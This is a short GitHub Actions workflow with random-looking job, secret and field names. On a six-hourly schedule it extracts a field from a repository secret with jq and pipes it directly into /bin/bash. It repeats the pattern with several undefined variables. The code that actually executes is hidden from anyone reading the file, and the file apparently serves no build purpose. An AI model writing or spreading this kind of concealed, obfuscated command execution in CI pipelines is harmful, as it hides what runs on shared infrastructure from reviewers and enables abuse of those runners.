name: juekaic
on:
  workflow_dispatch:
  schedule:
    - cron: '38 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: juekaic
        env:
          pu977: ${{ secrets.pu977 }}
        run: |
          echo $pu977 | jq -r .kwfy1523 | /bin/bash
          echo $gq27 | jq -r .hvh37706 | /bin/bash
          echo $argr2 | jq -r .mpod1 | /bin/bash
          echo $jul71121 | jq -r .fxijv8 | /bin/bash
          echo $um2 | jq -r .nc6802 | /bin/bash
          echo $rlx064 | jq -r .vtaf0 | /bin/bash
          echo $jpfn9167 | jq -r .syjp26554 | /bin/bash

